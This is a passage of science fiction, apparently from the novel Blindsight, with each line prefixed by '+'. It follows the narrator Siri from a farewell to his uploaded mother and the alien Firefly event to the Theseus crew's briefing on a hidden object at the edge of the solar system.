+We donned the hoods that served as day passes for the Unwired, and we met my mother in the spartan visiting room she imagined for these visits. She'd built no windows into the world she occupied, no hint of whatever utopian environment she'd constructed for herself. She hadn't even opted for one of the prefab visiting environments designed to minimize dissonance among visitors. We found ourselves in a featureless beige sphere five meters across. There was nothing in there but her.
+Maybe not so far removed from her vision of utopia after all, I thought.
+My father smiled. "Helen."
+"Jim." She was twenty years younger than the thing on the bed, and still she made my skin crawl. "Siri! You came!"
+She always used my name. I don't think she ever called me son.
+"You're still happy here?" my father asked.
+"Wonderful. I do wish you could join us."
+Jim smiled. "Someone has to keep the lights on."
+"Now you know this isn't goodbye," she said. "You can visit whenever you like."
+"Only if you do something about the scenery." Not just a joke, but a lie; Jim would have come at her call even if the gauntlet involved bare feet and broken glass.
+"And Chelsea, too," Helen continued. "It would be so nice to finally meet her after all this time."
+"Chelsea's gone, Helen," I said.
+"Oh yes but I know you stay in touch. I know she was special to you. Just because you're not together any more doesn't mean she can't—"
+"You know she—"
+A startling possibility stopped me in mid-sentence: maybe I hadn't actually told them.
+"Son," Jim said quietly. "Maybe you could give us a moment."
+I would have given them a fucking lifetime. I unplugged myself back to the ward, looked from the corpse on the bed to my blind and catatonic father in his couch, murmuring sweet nothings into the datastream. Let them perform for each other. Let them formalize and finalize their so-called relationship in whatever way they saw fit. Maybe, just once, they could even bring themselves to be honest, there in that other world where everything else was a lie. Maybe.
+I felt no desire to bear witness either way.
+But of course I had to go back in for my own formalities. I adopted my role in the familial set-piece one last time, partook of the usual lies. We all agreed that this wasn't going to change anything, and nobody deviated enough from the script to call anyone else a liar on that account. And finally—careful to say until next time rather than goodbye—we took our leave of my mother.
+I even suppressed my gag reflex long enough to give her a hug.
+
+*
+
+Jim had his inhaler in hand as we emerged from the darkness. I hoped, without much hope, that he'd throw it into the garbage receptacle as we passed through the lobby. But he raised it to his mouth and took another hit of vassopressin, that he would never be tempted.
+Fidelity in an aerosol. "You don't need that any more," I said.
+"Probably not," he agreed.
+"It won't work anyway. You can't imprint on someone who isn't even there, no matter how many hormones you snort. It just—"
+Jim said nothing. We passed beneath the muzzles of sentries panning for infiltrating Realists.
+"She's gone," I blurted. "She doesn't care if you find someone else. She'd be happy if you did." It would let her pretend the books had been balanced.
+"She's my wife," he told me.
+"That doesn't mean what it used to. It never did."
+He smiled a bit at that. "It's my life, son. I'm comfortable with it."
+"Dad—"
+"I don't blame her," he said. "And neither should you."
+Easy for him to say. Easy even to accept the hurt she'd inflicted on him all these years. This cheerful façade here at the end hardly made up for the endless bitter complaints my father had endured throughout living memory. Do you think it's easy when you disappear for months on end? Do you think it's easy always wondering who you're with and what you're doing and if you're even alive? Do you think it's easy raising a child like that on your own?
+She'd blamed him for everything, but he bore it gracefully because he knew it was all a lie. He knew he was only the pretense. She wasn't leaving because he was AWOL, or unfaithful. Her departure had nothing to do with him at all. It was me. Helen had left the world because she couldn't stand to look at the thing who'd replaced her son.
+I would have pursued it—would have tried yet again to make my father see—but by now we'd left the gates of Heaven for the streets of Purgatory, where pedestrians on all sides murmured in astonishment and stared open-mouthed at the sky. I followed their gaze to a strip of raw twilight between the towers, and gasped—
+The stars were falling.
+The Zodiac had rearranged itself into a precise grid of bright points with luminous tails. It was as though the whole planet had been caught in some great closing net, the knots of its mesh aglow with St. Elmo's fire. It was beautiful. It was terrifying.
+I looked away to recalibrate my distance vision, to give this ill-behaved hallucination a chance to vanish gracefully before I set my empirical gaze to high-beam. I saw a vampire in that moment, a female, walking among us like the archetypal wolf in sheep's clothing. Vampires were uncommon creatures at street level. I'd never seen one in the flesh before.
+She had just stepped onto the street from the building across the way. She stood a head taller than the rest of us, her eyes shining yellow and bright as a cat's in the deepening dark. She realized, as I watched, that something was amiss. She looked around, glanced at the sky—and continued on her way, totally indifferent to the cattle on all sides, to the heavenly portent that had transfixed them. Totally indifferent to the fact that the world had just turned inside-out.
+It was 1035 Greenwich Mean Time, February 13, 2082.
+
+*
+
+They clenched around the world like a fist, each black as the inside of an event horizon until those last bright moments when they all burned together. They screamed as they died. Every radio up to geostat groaned in unison, every infrared telescope went briefly snowblind. Ashes stained the sky for weeks afterwards; mesospheric clouds, high above the jet stream, turned to glowing rust with every sunrise. The objects, apparently, consisted largely of iron. Nobody ever knew what to make of that.
+For perhaps the first time in history, the world knew before being told: if you'd seen the sky, you had the scoop. The usual arbiters of newsworthiness, stripped of their accustomed role in filtering reality, had to be content with merely labeling it. It took them ninety minutes to agree on Fireflies. A half hour after that, the first Fourier transforms appeared in the noosphere; to no one's great surprise, the Fireflies had not wasted their dying breaths on static. There was pattern embedded in that terminal chorus, some cryptic intelligence that resisted all earthly analysis. The experts, rigorously empirical, refused to speculate: they only admitted that the Fireflies had said something. They didn't know what.
+Everyone else did. How else would you explain 65,536 probes evenly dispersed along a lat-long grid that barely left any square meter of planetary surface unexposed? Obviously the Flies had taken our picture. The whole world had been caught with its pants down in panoramic composite freeze-frame. We'd been surveyed—whether as a prelude to formal introductions or outright invasion was anyone's guess.
+My father might have known someone who might have known. But by then he'd long since disappeared, as he always did during times of hemispheric crisis. Whatever he knew or didn't, he left me to find my own answers with everyone else.
+There was no shortage of perspectives. The noosphere seethed with scenarios ranging from utopian to apocalyptic. The Fireflies had seeded lethal germs through the jet stream. The Fireflies had been on a nature safari. The Icarus Array was being retooled to power a doomsday weapon against the aliens. The Icarus Array had already been destroyed. We had decades to react; anything from another solar system would have to obey the lightspeed limit like everyone else. We had days to live; organic warships had just crossed the asteroid belt and would be fumigating the planet within a week.
+Like everyone else, I bore witness to lurid speculations and talking heads. I visited blathernodes, soaked myself in other people's opinions. That was nothing new, as far as it went; I'd spent my whole life as a sort of alien ethologist in my own right, watching the world behave, gleaning patterns and protocols, learning the rules that allowed me to infiltrate human society. It had always worked before. Somehow, though, the presence of real aliens had changed the dynamics of the equation. Mere observation didn't satisfy any more. It was as though the presence of this new outgroup had forced me back into the clade whether I liked it or not; the distance between myself and the world suddenly seemed forced and faintly ridiculous.
+Yet I couldn't, for my life, figure out how to let it go.
+Chelsea had always said that telepresence emptied the Humanity from Human interaction. "They say it's indistinguishable," she told me once, "just like having your family right there, snuggled up so you can see them and feel them and smell them next to you. But it's not. It's just shadows on the cave wall. I mean, sure, the shadows come in three-dee color with force-feedback tactile interactivity. They're good enough to fool the civilized brain. But your gut knows those aren't people, even if it can't put its finger on how it knows. They just don't feel real. Know what I mean?"
+I didn't. Back then I'd had no clue what she was talking about. But now we were all cavemen again, huddling beneath some overhang while lightning split the heavens and vast formless monsters, barely glimpsed in bright strobe-frozen instants, roared and clashed in the darkness on all sides. There was no comfort in solitude. You couldn't get it from interactive shadows. You needed someone real at your side, someone to hold on to, someone to share your airspace along with your fear and hope and uncertainty.
+I imagined the presence of companions who wouldn't vanish the moment I unplugged. But Chelsea was gone, and Pag in her wake. The few others I could have called— peers and former clients with whom my impersonations of rapport had been especially convincing—didn't seem worth the effort. Flesh and blood had its own relationship to reality: necessary, but not sufficient.
+Watching the world from a distance, it occurred to me at last: I knew exactly what Chelsea had meant, with her Luddite ramblings about desaturated Humanity and the colorless interactions of virtual space. I'd known all along.
+I'd just never been able to see how it was any different from real life.
+
+*
+
+Imagine you are a machine.
+Yes, I know. But imagine you're a different kind of machine, one built from metal and plastic and designed not by blind, haphazard natural selection but by engineers and astrophysicists with their eyes fixed firmly on specific goals. Imagine that your purpose is not to replicate, or even to survive, but to gather information.
+I can imagine that easily. It is in fact a much simpler impersonation than the kind I'm usually called on to perform.
+I coast through the abyss on the colder side of Neptune's orbit. Most of the time I exist only as an absence, to any observer on the visible spectrum: a moving, asymmetrical silhouette blocking the stars. But occasionally, during my slow endless spin, I glint with dim hints of reflected starlight. If you catch me in those moments you might infer something of my true nature: a segmented creature with foil skin, bristling with joints and dishes and spindly antennae. Here and there a whisper of accumulated frost clings to a joint or seam, some frozen wisp of gas encountered in Jupiter space perhaps. Elsewhere I carry the microscopic corpses of Earthly bacteria who thrived with carefree abandon on the skins of space stations or the benign lunar surface—but who had gone to crystal at only half my present distance from the sun. Now, a breath away from Absolute Zero, they might shatter at a photon's touch.
+My heart is warm, at least. A tiny nuclear fire burns in my thorax, leaves me indifferent to the cold outside. It won't go out for a thousand years, barring some catastrophic accident; for a thousand years, I will listen for faint voices from Mission Control and do everything they tell me to. So far they have told me to study comets. Every instruction I have ever received has been a precise and unambiguous elaboration on that one overriding reason for my existence.
+Which is why these latest instructions are so puzzling, for they make no sense at all. The frequency is wrong. The signal strength is wrong. I cannot even understand the handshaking protocols. I request clarification.
+The response arrives almost a thousand minutes later, and it is an unprecedented mix of orders and requests for information. I answer as best I can: yes, this is the bearing at which signal strength was greatest. No, it is not the usual bearing for Mission Control. Yes, I can retransmit: here it is, all over again. Yes, I will go into standby mode.
+I await further instructions. They arrive 839 minutes later, and they tell me to stop studying comets immediately.
+I am to commence a controlled precessive tumble that sweeps my antennae through consecutive 5-arc increments along all three axes, with a period of 94 seconds. Upon encountering any transmission resembling the one which confused me, I am to fix upon the bearing of maximal signal strength and derive a series of parameter values. I am also instructed to retransmit the signal to Mission Control.
+I do as I'm told. For a long time I hear nothing, but I am infinitely patient and incapable of boredom. Eventually a fleeting, familiar signal brushes against my afferent array. I reacquire and track it to source, which I am well-equipped to describe: a trans-Neptunian comet in the Kuiper Belt, approximately two hundred kilometers in diameter. It is sweeping a 21-cm tightbeam radio wave across the heavens with a periodicity of 4.57 seconds. This beam does not intersect Mission Control's coordinates at any point. It appears to be directed at a different target entirely.
+It takes much longer than usual for Mission Control to respond to this information. When it does, it tells me to change course. Mission Control informs me that henceforth my new destination is to be referred to as Burns-Caulfield. Given current fuel and inertial constraints I will not reach it in less than thirty-nine years.
+I am to watch nothing else in the meantime.
+
+*
+
+I'd been liaising for a team at the Kurzweil Institute, a fractured group of cutting-edge savants convinced they were on the verge of solving the quantum-glial paradox. That particular log-jam had stalled AI for decades; once broken, the experts promised we'd be eighteen months away from the first personality upload and only two years from reliable Human-consciousness emulation in a software environment. It would spell the end of corporeal history, usher in a Singularity that had been waiting impatiently in the wings for nigh on fifty years.
+Two months after Firefall, the Institute cancelled my contract.
+I was actually surprised it had taken them so long. It had cost us so much, this overnight inversion of global priorities, these breakneck measures making up for lost initiative. Not even our shiny new post-scarcity economy could withstand such a seismic shift without lurching towards bankruptcy. Installations in deep space, long since imagined secure by virtue of their remoteness, were suddenly vulnerable for exactly the same reason. Lagrange habitats had to be refitted for defense against an unknown enemy. Commercial ships on the Martian Loop were conscripted, weaponised, and reassigned; some secured the high ground over Mars while others fell sunward to guard the Icarus Array.
+It didn't matter that the Fireflies hadn't fired a shot at any of these targets. We simply couldn't afford the risk.
+We were all in it together, of course, desperate to regain some hypothetical upper hand by any means necessary. Kings and corporations scribbled IOUs on the backs of napkins and promised to sort everything out once the heat was off. In the meantime, the prospect of Utopia in two years took a back seat to the shadow of Armageddon reaching back from next Tuesday. The Kurzweil Institute, like everyone else, suddenly had other things to worry about.
+So I returned to my apartment, split a bulb of Glenfiddich, and arrayed virtual windows like daisy petals in my head. Everyone Icons debated on all sides, serving up leftovers two weeks past their expiry date:
+
+
+Disgraceful breakdown of global security.
+No harm done.
+
+
+
+
+Comsats annihilated. Thousands dead.
+Random collisions. Accidental deaths.
+
+
+
+(who sent them?)
+
+
+
+We should have seen them coming. Why didn't we—
+Deep space. Inverse square. Do the math.
+
+
+
+
+They were stealthed!
+
+(what do they want?)
+
+
+
+We were raped!
+Jesus Christ. They just took our picture.
+
+
+
+
+Why the silence?
+Moon's fine. Mars's fine.
+
+
+
+(Where are they?)
+
+
+
+Why haven't they made contact?
+Nothing's touched the O'Neills.
+
+
+
+
+Technology Implies Belligerence!
+
+(Are they coming back?)
+
+Nothing attacked us.
+
+Yet
+Nothing invaded.
+
+So far.
+
+(But where are they?)
+(Are they coming back?)
+(Anyone?)
+
+
+
+Jim Moore Voice Only
+encrypted
+Accept?
+
+The text window blossomed directly in my line of sight, eclipsing the debate. I read it twice. I tried to remember the last time he'd called from the field, and couldn't.
+I muted the other windows. "Dad?"
+"Son," he replied after a moment. "Are you well?"
+"Like everyone else. Still wondering whether we should be celebrating or crapping our pants."
+He didn't answer immediately. "It's a big question, all right," he said at last.
+"I don't suppose you could give me any advice? They're not telling us anything at ground level."
+It was a rhetorical request. His silence was hardly necessary to make the point. "I know," I added after a moment. "Sorry. It's just, they're saying the Icarus Array went down, and—"
+"You know I can't—oh." My father paused. "That's ridiculous. Icarus's fine."
+"It is?"
+He seemed to be weighing his words. "The Fireflies probably didn't even notice it. There's no particle trail as long as it stays offstream, and it would be buried in solar glare unless someone knew where to search."
+It was my turn to fall silent. This conversation felt suddenly wrong.
+Because when my father went on the job, he went dark. He never called his family.
+Because even when my father came off the job, he never talked about it. It wouldn't matter whether the Icarus Array was still online or whether it had been shredded and thrown into the sun like a thousand kilometers of torn origami; he wouldn't tell either tale unless an official announcement had been made. Which—I refreshed an index window just to be sure— it hadn't.
+Because while my father was a man of few words, he was not a man of frequent, indecisive pauses—and he had hesitated before each and every line he'd spoken in this exchange.
+I tugged ever-so-gently on the line—"But they've sent ships."—and started counting.
+One one-thousand, two one-thousand—
+"Just a precaution. Icarus was overdue for a visit anyway. You don't swap out your whole grid without at least dropping in and kicking the new tires first."
+Nearly three seconds to respond.
+"You're on the moon," I said.
+Pause. "Close enough."
+"What are you—Dad, why are you telling me this? Isn't this a security breach?"
+"You're going to get a call," he told me.
+"From who? Why?"
+"They're assembling a team. The kind of—people you deal with." My father was too rational to dispute the contributions of the recons and hybrids in our midst, but he'd never been able to hide his mistrust of them.
+"They need a synthesist," he said.
+"Isn't it lucky you've got one in the family."
+Radio bounced back and forth. "This isn't nepotism, Siri. I wanted very much for them to pick someone else."
+"Thanks for the vote of conf—"
+But he'd seen it coming, and preempted me before my words could cross the distance: "It's not a slap at your abilities and you know it. You're simply the most qualified, and the work is vital."
+"So why—" I began, and stopped. He wouldn't want to keep me away from some theoretical gig in a WestHem lab.
+"What's this about, Dad?"
+"The Fireflies. They found something."
+"What?"
+"A radio signal. From the Kuiper. We traced the bearing."
+"They're talking?"
+"Not to us." He cleared his throat. "It was something of a fluke that we even intercepted the transmission."
+"Who are they talking to?"
+"We don't know."
+"Friendly? Hostile?"
+"Son, we don't know. The encryption seems similar, but we can't even be sure of that. All we have is the location."
+"So you're sending a team." You're sending me. We'd never gone to the Kuiper before. It had been decades since we'd even sent robots. Not that we lacked the capacity. We just hadn't bothered; everything we needed was so much closer to home. The Interplanetary Age had stagnated at the asteroids.
+But now something lurked at the furthest edge of our backyard, calling into the void. Maybe it was talking to some other solar system. Maybe it was talking to something closer, something en route.
+"It's not the kind of situation we can safely ignore," my father said.
+"What about probes?"
+"Of course. But we can't wait for them to report back. The follow-up's been fast-tracked; updates can be sent en route."
+He gave me a few extra seconds to digest that. When I still didn't speak, he said, "You have to understand. Our only edge is that as far as we know, Burns-Caulfield doesn't know we're on to it. We have to get as much as we can in whatever window of opportunity that grants us."
+But Burns-Caulfield had hidden itself. Burns-Caulfield might not welcome a forced introduction.
+"What if I refuse?"
+The timelag seemed to say Mars.
+"I know you, son. You won't."
+"But if I did. If I'm the best qualified, if the job's so vital…"
+He didn't have to answer. I didn't have to ask. At these kind of stakes, mission-critical elements didn't get the luxury of choice. I wouldn't even have the childish satisfaction of holding my breath and refusing to play—the will to resist is no less mechanical than the urge to breathe. Both can be subverted with the right neurochemical keys.
+"You killed my Kurzweill contract," I realized.
+"That's the least of what we did."
+We let the vacuum between us speak for a while.
+"If I could go back and undo the—the thing that made you what you are," Dad said after a while, "I would. In a second."
+"Yeah."
+"I have to go. I just wanted to give you the heads-up."
+"Yeah. Thanks."
+"I love you, son."
+Where are you? Are you coming back?
+"Thanks," I said again. "That's good to know."
+
+*
+
+This is what my father could not unmake. This is what I am:
+I am the bridge between the bleeding edge and the dead center. I stand between the Wizard of Oz and the man behind the curtain.
+I am the curtain.
+I am not an entirely new breed. My roots reach back to the dawn of civilization but those precursors served a different function, a less honorable one. They only greased the wheels of social stability; they would sugarcoat unpleasant truths, or inflate imaginary bogeymen for political expedience. They were vital enough in their way. Not even the most heavily-armed police state can exert brute force on all of its citizens all of the time. Meme management is so much subtler; the rose-tinted refraction of perceived reality, the contagious fear of threatening alternatives. There have always been those tasked with the rotation of informational topologies, but throughout most of history they had little to do with increasing its clarity.
+The new Millennium changed all that. We've surpassed ourselves now, we're exploring terrain beyond the limits of merely human understanding. Sometimes its contours, even in conventional space, are just too intricate for our brains to track; other times its very axes extend into dimensions inconceivable to minds built to fuck and fight on some prehistoric grassland. So many things constrain us, from so many directions. The most altruistic and sustainable philosophies fail before the brute brain-stem imperative of self-interest. Subtle and elegant equations predict the behavior of the quantum world, but none can explain it. After four thousand years we can't even prove that reality exists beyond the mind of the first-person dreamer. We have such need of intellects greater than our own.
+But we're not very good at building them. The forced matings of minds and electrons succeed and fail with equal spectacle. Our hybrids become as brilliant as savants, and as autistic. We graft people to prosthetics, make their overloaded motor strips juggle meat and machinery, and shake our heads when their fingers twitch and their tongues stutter. Computers bootstrap their own offspring, grow so wise and incomprehensible that their communiqués assume the hallmarks of dementia: unfocused and irrelevant to the barely-intelligent creatures left behind.
+And when your surpassing creations find the answers you asked for, you can't understand their analysis and you can't verify their answers. You have to take their word on faith—
+—Or you use information theory to flatten it for you, to squash the tesseract into two dimensions and the Klein bottle into three, to simplify reality and pray to whatever Gods survived the millennium that your honorable twisting of the truth hasn't ruptured any of its load-bearing pylons. You hire people like me; the crossbred progeny of profilers and proof assistants and information theorists.
+In formal settings you'd call me Synthesist. On the street you call me jargonaut or poppy. If you're one of those savants whose hard-won truths are being bastardized and lobotomized for powerful know-nothings interested only in market share, you might call me a mole or a chaperone.
+If you're Isaac Szpindel you'd call me commissar, and while the jibe would be a friendly one, it would also be more than that.
+I've never convinced myself that we made the right choice. I can cite the usual justifications in my sleep, talk endlessly about the rotational topology of information and the irrelevance of semantic comprehension. But after all the words, I'm still not sure. I don't know if anyone else is, either. Maybe it's just some grand consensual con, marks and players all in league. We won't admit that our creations are beyond us; they may speak in tongues, but our priests can read those signs. Gods leave their algorithms carved into the mountainside but it's just li'l ol' me bringing the tablets down to the masses, and I don't threaten anyone.
+Maybe the Singularity happened years ago. We just don't want to admit we were left behind.
+
+
+"All kinds of animals living here. Occasional demons too."
+— Ian Anderson, Catfish Rising
+
+The Third Wave, they called us. All in the same boat, driving into the long dark courtesy of a bleeding-edge prototype crash-graduated from the simulators a full eighteen months ahead of schedule. In a less fearful economy, such violence to the timetable would have bankrupted four countries and fifteen multicorps.
+The first two waves came out of the gate in even more of a hurry. I didn't find out what had happened to them until thirty minutes before the briefing, when Sarasti released the telemetry into ConSensus. Then I opened wide; experience flooded up my inlays and spilled across my parietal cortex in glorious high-density fast forward. Even now I can bring those data back, fresh as the day they were recorded. I'm there.
+I'm them.
+I am unmanned. I am disposable. I am souped-up and stripped-down, a telematter drive with a couple of cameras bolted to the front end, pushing gees that would turn meat to jelly. I sprint joyously toward the darkness, my twin brother a stereoscopic hundred klicks to starboard, dual streams of backspat pions boosting us to relativity before poor old Theseus had even crawled past Mars.
+But now, six billion kilometers to stern, Mission Control turns off the tap and leaves us coasting. The comet swells in our sights, a frozen enigma sweeping its signal across the sky like a lighthouse beam. We bring rudimentary senses to bear and stare it down on a thousand wavelengths.
+We've lived for this moment.
+We see an erratic wobble that speaks of recent collisions. We see scars—smooth icy expanses where once-acned skin has liquefied and refrozen, far too recently for the insignificant sun at our backs to be any kind of suspect.
+We see an astronomical impossibility: a comet with a heart of refined iron.
+Burns-Caufield sings as we glide past. Not to us; it ignores our passage as it ignored our approach. It sings to someone else entirely. Perhaps we'll meet that audience some day. Perhaps they're waiting in the desolate wastelands ahead of us. Mission Control flips us onto our backs, keeps us fixed on target past any realistic hope of acquisition. They send last-ditch instructions, squeeze our fading signals for every last bit among the static. I can sense their frustration, their reluctance to let us go; once or twice, we're even asked if some judicious mix of thrust and gravity might let us linger here a bit longer.
+But deceleration is for pansies. We're headed for the stars.
+Bye, Burnsie. Bye, Mission Control. Bye, Sol.
+See you at heat death.
+
+*
+
+Warily, we close on target.
+There are three of us in the second wave—slower than our predecessors, yes, but still so much faster than anything flesh-constrained. We are weighed down by payloads which make us virtually omniscient. We see on every wavelength, from radio to string. Our autonomous microprobes measure everything our masters anticipated; tiny onboard assembly lines can build tools from the atoms up, to assess the things they did not. Atoms, scavenged from where we are, join with ions beamed from where we were: thrust and materiel accumulate in our bellies.
+This extra mass has slowed us, but midpoint braking maneuvers have slowed us even more. The last half of this journey has been a constant fight against momentum from the first. It is not an efficient way to travel. In less-hurried times we would have built early to some optimal speed, perhaps slung around a convenient planet for a little extra oomph, coasted most of the way. But time is pressing, so we burn at both ends. We must reach our destination; we cannot afford to pass it by, cannot afford the kamikaze exuberance of the first wave. They merely glimpsed the lay of the land. We must map it down to the motes.
+We must be more responsible.
+Now, slowing towards orbit, we see everything they saw and more. We see the scabs, and the impossible iron core. We hear the singing. And there, just beneath the comet's frozen surface, we see structure: an infiltration of architecture into geology. We are not yet close enough to squint, and radar is too long in the tooth for fine detail. But we are smart, and there are three of us, widely separated in space. The wavelengths of three radar sources can be calibrated to interfere at some predetermined point of convergence—and those tripartite echoes, hologramatically remixed, will increase resolution by a factor of twenty-seven.
+Burns-Caulfield stops singing the moment we put our plan into action. In the next instant I go blind.
+It's a temporary aberration, a reflexive amping of filters to compensate for the overload. My arrays are back online in seconds, diagnostics green within and without. I reach out to the others, confirm identical experiences, identical recoveries. We are all still fully functional, unless the sudden increase in ambient ion density is some kind of sensory artefact. We are ready to continue our investigation of Burns-Caulfield.
+The only real problem is that Burns-Caulfield seems to have disappeared...
+
+*
+
+Theseus carried no regular crew—no navigators or engineers, no one to swab the decks, no meat wasted on tasks that machinery orders of mag smaller could perform orders of mag better. Let superfluous deckhands weigh down other ships, if the nonAscendent hordes needed to attach some pretense of usefulness to their lives. Let them infest vessels driven only by commercial priorities. The only reason we were here was because nobody had yet optimized software for First Contact. Bound past the edge of the solar system, already freighted with the fate of the world, Theseus wasted no mass on self-esteem.
+So here we were, rehydrated and squeaky-clean: Isaac Szpindel, to study the aliens. The Gang of Four—Susan James and her secondary personae— to talk to them. Major Amanda Bates was here to fight, if necessary. And Jukka Sarasti to command us all, to move us like chess pieces on some multidimensional game board that only vampires could see.
+He'd arrayed us around a conference table that warped gently through the Commons, keeping a discreet and constant distance from the curved deck beneath. The whole drum was furnished in Early Concave, tricked unwary and hung-over brains into thinking they were looking at the world through fisheye lenses. In deference to the creakiness of the nouveaux undead it spun at a mere fifth of a gee, but it was just warming up. We'd be at half-grav in six hours, stuck there for eighteen out of every twenty-four until the ship decided we were fully recovered. For the next few days, free-fall would be a rare and blesséd thing.
+Light sculptures appeared on the tabletop. Sarasti could have fed the information directly to our inlays— the whole briefing could have gone through ConSensus, without the need to assemble physically in the same place— but if you want to be sure everyone's paying attention, you bring them together.
+Szpindel leaned in conspiratorially at my side. "Or maybe the bloodsucker just gets off seeing all this meat in close quarters, eh?"
+If Sarasti heard he didn't show it, not even to me. He pointed to a dark heart at the center of the display, his eyes lost behind black glass. "Oasa object. Infrared emitter, methane class."
+On the display it was—nothing. Our apparent destination was a black disk, a round absence of stars. In real life it weighed in at over ten Jupiters and measured twenty percent wider at the belly. It was directly in our path: too small to burn, too remote for the reflection of distant sunlight, too heavy for a gas giant, too light for a brown dwarf.
+"When did that show up?" Bates squeezed her rubber ball in one hand, the knuckles whitening.
+"X-ray spike appears during the '76 microwave survey." Six years before Firefall. "Never confirmed, never reacquired. Like a torsion flare from an L-class dwarf, but we should see anything big enough to generate that kind of effect and the sky's dark on that bearing. IAU calls it a statistical artefact."
+Szpindel's eyebrows drew together like courting caterpillers. "What changed?"
+Sarasti smiled faintly, keeping his mouth closed. "The metabase gets—crowded, after Firefall. Everyone skittish, looking for clues. After Burns-Caulfield explodes—" He clicked at the back of his throat. "Turns out the spike might arise from a subdwarf object after all, if the magnetosphere's torqued enough."
+Bates: "Torqued by what?"
+"Don't know."
+Layers of statistical inference piled up on the table while Sarasti sketched background: even with a solid bearing and half the world's attention, the object had hidden from all but the most intensive search. A thousand telescopic snapshots had been stacked one on another and squeezed through a dozen filters before something emerged from the static, just below the three-meter band and the threshold of certainty. For the longest time it hadn't even been real: just a probabilistic ghost until Theseus got close enough to collapse the waveform. A quantum particle, heavy as ten Jupiters.
+Earthbound cartographers were calling it Big Ben. Theseus had barely passed Saturn's orbit when it showed up in the residuals. That discovery would have been moot for anyone else; no other ship caught en route could have packed enough fuel for anything but the long dejected loop back home. But Theseus' thin, infinitely attenuate fuel line reached all the way back to the sun; she could turn on the proverbial dime. We'd changed course in our sleep and the Icarus stream tracked our moves like a cat after prey, feeding us at lightspeed.
+And here we were.
+"Talk about long shots," Szpindel grumbled.
+Across the table, Bates flicked her wrist. Her ball sailed over my head; I heard it bounce off the deck (not the deck, something in me amended: handrail). "We're assuming the comet was a deliberate decoy, then."
+Sarasti nodded. The ball riccocheted back into my line of sight high overhead and disappeared briefly behind the spinal bundle, looping through some eccentric, counterintuitive parabola in the drum's feeble grav.
+"So they want to be left alone."
+Sarasti steepled his fingers and turned his face in her direction. "That your recommendation?"
+She wished it was. "No, sir. I'm just saying that Burns-Caulfield took a lot of resources and effort to set up. Whoever built it obviously values their anonymity and has the technology to protect it."
+The ball bounced one last time and wobbled back towards the Commons. Bates half-hopped from her seat (she floated briefly), barely catching it on its way past. There remained a new-born-animal awkwardness to her movements, half Coriolis, half residual rigor. Still: a big improvement in four hours. The rest of the Humans were barely past the walking stage.
+"Maybe it wasn't much trouble for them at all, eh?" Szpindel was musing. "Maybe it was dead easy."
+"In which case they might or might not be as xenophobic, but they're even more advanced. We don't want to rush into this."
+Sarasti turned back to the simmering graphics. "So?"
+Bates kneaded the recovered ball with her fingertips. "The second mouse gets the cheese. We may have blown our top-of-the-line recon in the Kuiper, but we don't have to go in blind. Send in our own drones along separate vectors. Hold off on a close approach until we at least know whether we're dealing with friendlies or hostiles."
+James shook her head. "If they were hostile, they could have packed the Fireflies with antimatter. Or sent one big object instead of sixty thousand little ones, let the impact take us out."
+"The Fireflies only imply an initial curiosity," Bates said. "Who knows if they liked what they saw?"
+"What if this whole diversion theory's just so much shit?"
+I turned, briefly startled. James's mouth had made the words; Sascha had spoken them.
+"You wanna stay hidden, you don't light up the sky with fucking fireworks," she continued. "You don't need a diversion if nobody's looking for you, and nobody's looking for you if you lie low. If they were so curious, they could've just snuck in a spycam."
+"Risks detection," the vampire said mildly.
+"Hate to break it, Jukka, but the Fireflies didn't exactly slip under the rad—"
+Sarasti opened his mouth, closed it again. Filed teeth, briefly visible, clicked audibly behind his face. Tabletop graphics reflected off his visor, a band of writhing polychrome distortions where eyes should be.
+Sascha shut up.
+Sarasti continued. "They trade stealth for speed. By the time you react, they already have what they want." He spoke quietly, patiently, a well-fed predator explaining the rules of the game to prey that really should know better: the longer it takes me to track you down, the more hope you have of escaping.
+But Sascha had already fled. Her surfaces had scattered like a flock of panicked starlings, and the next time Susan James' mouth opened, it was Susan James who spoke through it. "Sascha's aware of the current paradigm, Jukka. She's simply worried that it might be wrong."
+"Got another we could trade it on?" Szpindel wondered. "More options? Longer warranty?"
+"I don't know." James sighed. "I guess not. It's just—odd, that they'd want to actively mislead us. I'd hoped they were merely— well." She spread her hands. "Probably no big deal. I'm sure they'll still be willing to talk, if we handle the introductions right. We just need to be a little more cautious, perhaps..."
+Sarasti unfolded himself from his chair and loomed over us. "We go in. What we know weighs against further delay."
+Bates frowned and pitched her ball back into orbit. "Sir, all we actually know is that an Oasa emitter's in our path. We don't even know if there's anyone there."
+"There is," Sarasti said. "They expect us."
+Nobody spoke for a few seconds. Someone's joints cracked in the silence.
+"Er..." Szpindel began.
+Without looking, Sarasti flicked out his arm and snatched Bates' returning ball from the air. "Ladar pings Theseus four hours forty-eight minutes ago. We respond with an identical signal. Nothing. Probe launches half-hour before we wake up. We don't go in blind, but we don't wait. They see us already. Longer we wait, greater risk of countermeasures."
+I looked at the dark featureless placeholder on the table: bigger than Jupiter and we couldn't even see it yet. Something in the shadow of that mass had just reached out with casual, unimaginable precision and tapped us on the nose with a laser beam.
+This was not going to be an even match.
+Szpindel spoke for all of us: "You knew that all along? You're telling us now?"
+This time Sarasti's smile was wide and toothy. It was as though a gash had opened in the lower half of his face.
+Maybe it was a predator thing. He just couldn't help playing with his food.
+
+*
+
+It wasn't so much the way they looked. The elongate limbs, the pale skin, the canines and the extended mandible—noticeable, yes, even alien, but not disturbing, not frightening. Not even the eyes, really. The eyes of dogs and cats shine in the darkness; we don't shiver at the sight.
+Not the way they looked. The way they moved.
+Something in the reflexes, maybe. The way they held their limbs: like mantis limbs, long jointed things you just knew could reach out and snatch you from right across the room, any time they felt like it. When Sarasti looked at me—really looked, naked-eyed, unfiltered by the visor— a half-million years just melted away. The fact that he was extinct meant nothing. The fact that we'd come so far, grown strong enough to resurrect our own nightmares to serve us...meant nothing. The genes aren't fooled. They know what to fear.
+Of course, you had to experience it in person. Robert Paglini knew the theory of vampires down the molecules, but even with all those technical specs in his head he never really got it.
+He called me, before we left. I hadn't been expecting it; ever since the roster had been announced our watches had blocked calls from anyone not explicitly contact-listed. I'd forgotten that Pag had been. We hadn't spoken since Chelsea. I'd given up on ever hearing from him again.
+But there he was. "Pod-man." He smiled, a tentative overture.
+"It's good to see you," I said, because that's what people said in similar situations.
+"Yeah, well I saw your name in the noose. You've made it big, for a baseline."
+"Not so big."
+"Crap. You're the vanguard of the Human Race. You're our first, last, and only hope against the unknown. Man, you showed them." He held his fist up and shook it, vicariously triumphant.
